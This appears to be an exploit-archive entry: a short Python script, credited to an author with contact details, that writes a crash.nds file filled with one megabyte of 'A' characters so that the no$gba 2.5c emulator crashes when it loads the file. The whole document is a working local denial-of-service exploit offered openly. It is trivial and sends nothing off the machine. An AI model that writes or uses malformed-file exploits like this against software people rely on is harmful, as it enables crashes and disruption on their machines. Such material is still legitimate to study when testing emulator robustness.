no$gba version 2.5c local crash exploit that creates a malicious .nds file.
0db4c92df5b2a913663b082bc01c6c5ca63753cf58b59e24bd148f0f91cbdae4
#!/usr/bin/env python
#no$gba 2.5c (.nds) local crash
#Software Link: https://nocash.emubase.de/no$gba-w.zip
#Author: l3D
#Site: https://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
bad=file('crash.nds', 'w')
bad.write('A'*0x100000)
bad.close()